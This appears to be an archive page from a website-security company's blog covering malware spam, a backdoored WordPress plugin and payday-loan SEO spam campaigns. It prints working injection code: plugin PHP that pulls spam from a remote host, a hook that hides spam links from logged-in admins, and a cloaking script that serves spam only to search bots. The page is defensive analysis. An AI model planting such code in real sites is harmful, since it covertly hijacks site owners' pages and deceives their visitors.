Cyber Criminals Take Advantage of Recent Boston Attack with SPAM

April 17, 2013 by 1 Comment

It pains me to write about this at all, but as despicable as this might appear, cyber criminals have started to take advantage of those that have been affected by the recent tragedy in Boston – which pretty much means everyone with a pulse.

Trend Micro is reporting -

Mary Ermitano-Aquino noted a spam outbreak of more than 9,000 Blackhole Exploit Kit spammed messages, all related to the said tragedy that killed at least three people and injured many more. Some of the spammed messages used the subjects “2 Explosions at Boston Marathon,” “Aftermath to explosion at Boston Marathon,” “Boston Explosion Caught on Video,” and “Video of Explosion at the Boston Marathon 2013″ to name a few.

Sophos NakedSecurity is also reporting similar upticks –

Messages spammed out by attackers claim to contain a link to video footage of Monday’s terrorist activity in Boston, with subject lines such as “2 Explosions at Boston Marathon”…..If you make the mistake of clicking on the link, however, you are taken to a website which – while showing you genuine YouTube videos of the the horrific incident – attempts to infect your computer with a Windows Trojan horse that Sophos products detect as Troj/Tepfer-Q.

Unfortunately this is not just specific to emails, it appears that this is bleeding into all mediums, to include Facebook and Twitter. Aside from it being highly disturbing, all we can do is spread the word so that friends and families are not affected while emotionally distraught.

I plead with you that if you want to contribute and / or are interested in what is going on avoid clicking on social media and email links and go directly to known media outlets. Also, please don’t donate to random organizations, stick with known reputable organizations that you can verify.

Filed Under: awareness, Spam, sucuri Tagged With: , ,

WordPress Malicious Plugin – WPPPM – Abusing 404 Redirects with SEO Poisoning

April 13, 2013 by 12 Comments

Bruno Borges, of our security team, came across an interesting case this week, in which a WordPress plugin was abusing the 404 rewrite rules and redirecting all traffic to SPAM pages advertising a variety of things, the most common being:

FACTUAL STUDY: HYDROXYCITRIC ACID IN GARCINIA CAMBOGIA BURNS FAT.

The way it works is interesting, by default most would never realize they are even infected. The plugin is designed only to redirect incoming traffic that accidentally goes to a page that doesn’t exist. In most cases it would generates what we know as 404 pages, or state something like, Sorry this page doesn’t exist, etc… Well in this case, you’d be greeted with something like the following:

Read More

Filed Under: Malware, malware cleanup, plugins, Spam, sucuri, WordPress Tagged With: , , , , , ,

When Good Plugins Go Bad – SEO Spam on Joomla Websites

April 10, 2013 by 3 Comments

We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to paydaypam.co.uk. What’s even more scary is that in one day, the number of backlinks to paydaypam.co.uk, increased from 0 to almost 450k, according to ahrefs.com:

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.


Read More

Filed Under: joomla, Malware, malware_updates, Spam, WordPress Tagged With: , , , ,

WordPress Plugin Social Media Widget Hiding Spam – Remove it now

April 9, 2013 by 38 Comments

Authored by Daniel Cid and Tony Perez.

If you are using the Social Media Widget plugin (social-media-widget), make sure to remove it immediately from your website. We discovered it is being used to inject spam into websites and it has also been removed from the WordPress Plugin repository.

This is a very popular plugin with more than 900,000 downloads. It has the potential to impact a lot of websites.

Screen Shot 2013-04-09 at 11.03.12 AM

Technical details

The plugin has a hidden call to this URL: httx://i.aaur.net/i.php, which is used to inject “Pay Day Loan” spam into the web sites running the plugin. This is how it looks like in the browser:

function nemoViewState( ){
var a=0,m,v,t,z,x=new …
<p class="nemonn"><a href="httx://paydaypam.co. uk/" title="Payday Loan">payday loans

The malicious code was added only 12 days ago when they launched the version 4.0 of the plugin. So we are recommending that everyone removes that plugin immediately until we have more information. Our free SiteCheck scanner does identify if your site has been injected with this type of SPAM.

This is the code that was added to the plugin:

470
471 $smw_url = "hxxp://i.aaur.net/i.php";
472 if(!function_exists("smw_get")){
473 function smw_get($f) {
474 $response = wp_remote_get( $f );
475 if( is_wp_error( $response ) ) {
476 function smw_get_body($f) {
477 $ch = @curl_init();
478 @curl_setopt($ch, CURLOPT_URL, $f);
479 @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
480 $output = @curl_exec($ch);
481 @curl_close($ch);
482 return $output;
483 }
484 echo smw_get_body($f);
485 } else {
486 echo $response["body"];
487 }
488 }
489 smw_get($smw_url);
490 }

The code itself is very simply. You can see where they are pulling the malicious url on line 471. The rest is just error handling and embedding the injection.

In fact, if you want to try it safely, simply open your friendly terminal and run:

curl -D – hxxp://i.aaur.net/i.php

You’ll get something like this:

Screen Shot 2013-04-09 at 10.29.13 AM

You can clearly see the injection and in return the SPAM being injected. Now in this case you’re only seeing the injection, but once this is embedded in your website it’ll hide itself amongst all your other code, making it all that harder for you as a website owner to find. But exceptionally easy for search engines, like Google to flag.

The Real Concern

What is really concerning about this, isn’t even the SPAM injection. That happens all the time, it’s the fact that the malicious payload found it’s way in the core files. It was then uploaded to the WordPress.org Plugin Repository.

You can see what they did by looking at their changes:

This is version 4.0:
http://plugins.trac.wordpress.org/changeset?reponame=&new=688632%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=676169%40social-media-widget%2Ftrunk%2Fsocial-widget.php

They then updated 4.0, to better streamline the code:
http://plugins.trac.wordpress.org/changeset?reponame=&new=691839%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=688632%40social-media-widget%2Ftrunk%2Fsocial-widget.php

Then 17 hours ago it was removed: http://plugins.trac.wordpress.org/changeset?reponame=&new=693941%40social-media-widget%2Ftrunk%2Fsocial-widget.php&old=691839%40social-media-widget%2Ftrunk%2Fsocial-widget.php

It was likely Otto that removed it based on his response in the forums:

We forced an update to remove the discovered malware from already existing sites, however I highly recommend that you find another plugin.

So what does this tell us?

Well we know it’s not a vulnerability in the code, it’s an intentional injection, designed to compromise thousands. Very intelligent, but the question is by who.

First, the attacker is doing this directly to the core of the plugin. So, either it’s the author, or his credentials are compromised. Being that it was injected then modified it’s probably safe to say someone has access and they are not doing very nice things with it.

Second, kudos to the core team on finding and resolving the issue. It does however make you sit back and wonder, is this one isolated incident or is the going to be the new attack vector? If it’s the latter it causes grave concern, again demonstrating that the biggest vulnerability we all suffer is ourselves and our access.

Filed Under: plugins, Spam, WordPress Tagged With: , ,

Comment SPAM Bad Neighborhood Analysis (2013-Mar)

March 25, 2013 by 1 Comment

We track and block a lot of comment SPAM via our WordPress plugin and our CloudProxy WAF. One thing we noticed is that the majority of the SPAM we detect come from the same “bad neighbors” (IP ranges that are known for sending a lot of SPAM).

We did a little query for the month of March (just in 23 days) and these are the top 20 networks used by comment Spammers:

# of comments sent | IP range
42455 96.47.225.0/24
16502 173.44.37.0/24
13748 46.227.68.0/24
13597 194.71.223.0/24
13521 194.71.222.0/24
13422 194.71.224.0/24
13358 194.71.225.0/24
10563 117.21.225.0/24
10505 96.47.224.0/24
10325 91.236.74.0/24
10173 91.231.40.0/24
9262 142.91.81.0/24
8909 195.190.13.0/24
8423 94.242.241.0/24
7494 5.144.176.0/24
6980 94.242.237.0/24
6789 46.227.70.0/24
6772 46.227.71.0/24
6283 142.4.98.0/24
5860 91.236.75.0/24


Read More

Filed Under: cloudproxy, comment, Spam Tagged With: ,

Payday Loan Spam affecting Thousands of Sites

February 25, 2013 by 6 Comments

One of the most important metrics used by search engines to rank a site is the number of link backs that it has. The more links a site has for a specific keyword, the higher it will rank when someone searches for it. So if a site has a lot of links back for a keyword (say “loan”), if someone searches for “loan” it will rank very high.

That’s where SPAM SEO (Search Engine Optimization) comes int play. Instead of building content and growing a site to organically receive links back, criminals (yes, anyone that hacks someone’s else site for monetary gain is a criminal) will hack into websites and inject links that will target specific keywords.

Those links will then point to a website controlled by the attacker[s] that they want to have better ranking. Very often those links are conditional (only displayed for search engine bots) and hard to detect without a specialized scanning tool.

Payday Loan Spam

We see all types of SPAM, the most common used to be about pharma products (like Viagra  or Cialis), Cassinos online and pornographic pages. Lately, however, we have started to see a sharp increase in the number of sites injected with payday loan and money borrowing services.

The SPAM in it of itself once displayed is very simple, all it does is add a hidden link to a site to offer loans. Similar to:

<a href="httx://payday-all.co.uk/” title="Pay Day Loans Uk”>pay day loans uk</a>

When Google (or Bing) visits the compromised site it will see the link to payday-all.co.uk and increase the PR (page rank) for payday-all.co.uk. As more sites get infected and linking to payday-all, the better it will rank for keywords like “UK Pay day loan”.

Note that this type of spam is not new and we first blogged about it last year: Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla, explaining how they were being hidden inside WordPress sites.

Over the past year, this campaign continues to grow and evolve and their techniques have also matured.

Payday Loan Spam – The domains

Most of the payday spam we are tracking seems to end in one of the following domains (by a company called Cash Advance Online or Pay Day Online):

http://paydayloansyouknow.com.au/ (216.172.52.62)
http://paydayloanstores88paycheck.com/ (216.172.52.62)
http://quickcashnowgjyourself.com/ (216.172.52.64)
http://getin10minpaydayloans.com/ (216.172.52.64)
http://cheappaydayadvancevcadvanc.com (216.172.52.64)
http://cashadvancelocationsndbusiness.com (216.172.52.64)
http://findcashadvancefor.me/ (216.172.52.63)
http://findcashadvancenow4.me/ (216.172.52.64)
http://paydayloanlendersxocomprehensive.com/ (216.172.52.60)
http://personalcashloans64long.com/ (216.172.52.67)
http://loanstillpaydayncwith.com (216.172.52.67)
http://kopainstallmentpaydayloansonline.com (216.172.52.67)
http://ukropinstantloans.com (64.191.79.185)
http://pincashadvance.com (64.191.79.185)
http://perapaydayloansonline.com (64.191.79.185)
http://kopainstallmentpaydayloansonline.com/ (64.191.79.185)
http://loronlinepersonalloans.com/ (50.115.172.170)
http://inapersonalloans.com/ (50.115.172.24)
http://paydayloans10dokp.com/ (109.206.176.120)
http://paydayloans10tilp.com/ (173.214.248.102)
http://paydayloans10ukhw.com/ (173.214.248.100)
http://paydayloansthis.com/ (109.206.176.19)
http://www.payday-hawk.co.uk/ (184.173.197.237)
http://paydayloansfromnowon.com/ (109.206.176.11)
http://cash-loans247.co.uk/ (37.1.209.107)
http://payday-all.co.uk/ (37.1.209.107)

Here are some quick stats on the IPs above:

109.206.176.11	1
109.206.176.120	1
109.206.176.19	1
173.214.248.100	1
173.214.248.102	1
184.173.197.237	1
216.172.52.60	1
216.172.52.62	2
216.172.52.63	1
216.172.52.64	5
216.172.52.67	3
37.1.209.107	2
50.115.172.170	1
50.115.172.24	1
64.191.79.185	4

and 

109.206.176	3
173.214.248	2
184.173.197	1
216.172.52	12
37.1.209	2
50.115.172	2
64.191.79	4

Their templates all look the same, they try to convince the user to sign up and register with them to be pre-approved for a loan. This is the common landing page for Cash Advance Online:

Cash spam

And this is the template for Pay Day Online:

Spam cache 2

As you can see, a good and clean designed page trying to convince the user to sign up. What’s scary is the number of sites linked to them. If you do some searches on Google for the specific keywords they use:

“payday loans massachusetts” OR
“payday loan bad credit” OR
“business cash advance loans” OR
“No Fax Payday Loan”

You will find hundreds of thousands of pages linking to them. All from unrelated sites ranging from personal blogs, government sites, forums and universities.

Applying for a loan

After seeing so many sites with this spam, I felt compelled to see if can get a loan. So, I decided to try a few of them to see what would happened.

First, I filled the form that asked for a lot of personal information (Name, Address, email, Social security number, Bank information, etc). All of them denied me and redirected me to altohost.com, which in turn redirected me again to lenditfinancial.com.

http://getin10minpaydayloans.com/apply ->
https://altohost.com/system/thank.you.page/click.php?id=2610 ->

https://www.lenditfinancial.com/newcode/step2.php?referid=T3

Altohost is part of t3leads.com (affiliate marketing/tracking), so it seems the attackers are building this network of spam sites to redirect users to legitimate payment companies that offer affiliate commission (lendit Financial). Always about the money.

Payday Loan Spam – The hiding spot

As we said before, most of the spam is conditional, so a normal user visiting the site won’t see them. Only search engines (like Google or Bing) will see the malicious links added there. In addition to being conditional, the spam is also hidden via javascript. So if you are using a browser with javascript enabled, the spam will not show up.

This is the javascript used to hide the spam (that is also flagged by sitecheck):

SPAM seo push

And the attackers to do not stop there. On a WordPress site, they add the following piece of code (or similar) to inject the spam:

function b_call($b) {
if (!function_exists(“is_user_logged_in”) || is_user_logged_in() || !($m = get_option(“_metaproperty”))) {
return $b;
}
list($m, $n) = unserialize(trim(strrev($m)));
$b = preg_replace(“~<body[^>]*>~”, ‘\\0′.”\n”. $n .”\n”, $b);
$b = str_ireplace(“</head>”, $m.”\n</head>”, $b);
return $b;
}
function b_start() {
ob_start(“b_call”);
}
function b_end() {
ob_end_flush();
}
add_action(“wp_head”, “b_start”);
add_action(“wp_footer”, “b_end”);

Which will hide the code from anyone that is logged in (administrators of the site) and only display to the others. The spam content is also hidden inside the _metaproperty option inside the wp_options table.

The code changes at each new cycle of the spam, but the idea is the same. Make it harder for the owner of the site to detect and at the same time display the spam links to search engine bots.

Who is behind

It is very hard to point a specific organization or person responsible for those spam injections. The whois from all the domains is hidden and they seem to use quite a range of IP addresses. From our tests, they are pointing to affiliate links to try to make commission money from legitimate companies. So the only real way to track them is going after the legitimate lending companies and track who they are paying the money to.

Filed Under: hacked, Malware, malware_updates, pharma, Spam Tagged With: , , , ,

Website Malware – Fixing Joomla SPAM Hacks – Conditional Payloads

February 22, 2013 by 1 Comment

Our Senior Malware Engineer, Fioravante Cavallari, is at it again. I think he has made it his personal mission in life to expel all Joomla hacks, he loves them that much – true story.. ;)

In all seriousness, he found another gem yesterday. It’s well written; it includes comments explaining what they are doing, uses proper syntax, it was broken up and sprinkled throughout another good file generating no errors, it wasn’t obfuscated and it leverages good variable naming conventions. What more can we ask for, right?!?!?!

Don’t ask how we found it, a true gentlemen never discloses his nightly affairs.

The Pretty Payload – Nice Conditional Malware

A few months ago I wrote about Conditional Malware, we’d categorize this one into the same family. In my post it was a very simple explanation and code base, you could clearly see the IP’s being filtered and what it was doing, here we have to think a bit. Remember, you’re not likely to find it in tact like this, it’ll likely be broken and sprinkled through out your file. Here you go:

Read More

Filed Under: awareness, hacked, joomla, Malware, Spam, sucuri Tagged With: , , , ,

Large Scale Compromises Leading to Traffic Distribution System

February 15, 2013 by 3 Comments

For the last few weeks we’ve been tracking a large scale decentralized Traffic Distribution System (TDS). It’s using hundreds of compromised sites as their first entry point. Anyone that visits the compromised sites from a search engine gets redirected to another site controlled by the attackers (most of the time with pornographic or pharmaceutical content).

For each of those redirections, the bad guys make money via affiliate commissions. Symantec explains well how those traffic distrubution systems work here: Web-Based Malware Distribution Channels: A Look at Traffic Redistribution Systems.


Read More

Filed Under: hacked, Malware, malware_updates, pharma, Spam Tagged With: , , , ,

WordPress SPAM Causing Headaches

January 17, 2013 by 2 Comments

It seems that SPAM is all the rave these days, wonder why, could it be because it’s a multi-million business?

In any event, detecting is always a challenge as is remediating. This is what it might look like if you use our free scanner to scan the website:

Sucuri Spam Detection

Besides some of the obvious things we have started seeing tactics used on Joomla sites on WordPress ones. They are using things like this:


&#64require_once(ABSPATH . '/wp-includes/Text/cache.php');

You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:


<?php
$uniq_ua_string=@$_SERVER['HTTP_USER_AGENT'];
$uniq_ref=@$_SERVER["HTTP_REFERER"];
$is_human=1;
if (stristr($uniq_ua_string,"googlebot"))$is_human=0;
if (stristr($uniq_ua_string,"bing"))$is_human=0;
if (stristr($uniq_ua_string,"yahoo"))$is_human=0;
if(@$is_human == 0 && preg_match('/^\/(?:index\.(?:php|html?))?$/', @$_SERVER['REQUEST_URI'])) {
@readfile(dirname(__FILE__)."/css.php");
exit;
}
if(preg_match('/viagra/i', $uniq_ref) > 0) {header("Location: http://vaptk.com/in.php?t=v&s=1");exit;}

?>

If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:

Sucuri SPAM Payload

What can I say, sometimes it’s all about following the cookie trail.

When removing be sure to remove the &#64require_once and the payload as well. The good news is if you’re running our plugin you’ll quickly identify an integrity issue in wp-includes and wp-config that will allow you to quickly act to rectify the issue. Because of the time of injection we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.

Any questions let us know.

Filed Under: awareness, Malware, pharma, Spam, sucuri Tagged With: , , , , ,

Website Malware – Sharp Increase in SPAM Attacks – WordPress & Joomla

December 14, 2012 by 12 Comments

This past week we have seen a sharp increase in the use of old tactics designed to poison your search engine results – also known as Search Engine Poisoning (SEP) attacks. If you use our free scanner, SiteCheck, you’ll likely see something like the following:

Sucuri - ViewState Infection

You’re probably wondering, what the heck, how is that SEO SPAM? Allow me to explain what this is doing.

Read More

Filed Under: awareness, joomla, Malware, malware cleanup, research, security, Spam, sucuri, WordPress Tagged With: , , , , ,
«Older Posts